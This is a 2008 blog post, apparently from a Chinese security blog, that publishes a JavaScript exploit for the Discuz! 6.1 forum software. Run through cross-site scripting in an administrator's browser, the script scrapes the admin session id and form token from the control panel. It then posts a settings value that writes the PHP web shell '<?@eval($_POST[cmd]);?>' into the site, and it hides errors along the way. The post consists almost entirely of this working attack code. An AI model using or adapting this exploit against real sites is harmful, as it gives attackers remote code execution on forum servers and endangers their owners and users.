Discuz! 6.1 xss2webshell Exploit

    [多云 November 27, 2008 11:39 | by !4p47hy ]
Discuz! 6.1 xss2webshell Exploit
/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10]  Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
//目标url
var siteurl='http://www.80vul.com/Discuz_6.1.0/';

var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
xmlhttp=request;

//得到sid
xmlhttp.open("GET", siteurl+"admincp.php?frames=yes", false);
//firefox3 不可以用xmlhttp.send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
//thx luoluo@ph4nt0m.org
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = /action=home&sid=([\w\d]+)\" /i;
var arr=reg.exec(echo);
if(!arr){
//没有登陆后台
//alert(document.cookie);
}else{
var sid=arr[1];
}

//得到formhash
xmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
window.onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);

//通过SODB-2008-10写入webshell
//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
xmlhttp.open("POST", siteurl+"admincp.php?action=runwizard&step=3", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));
Tags: , , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7501)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive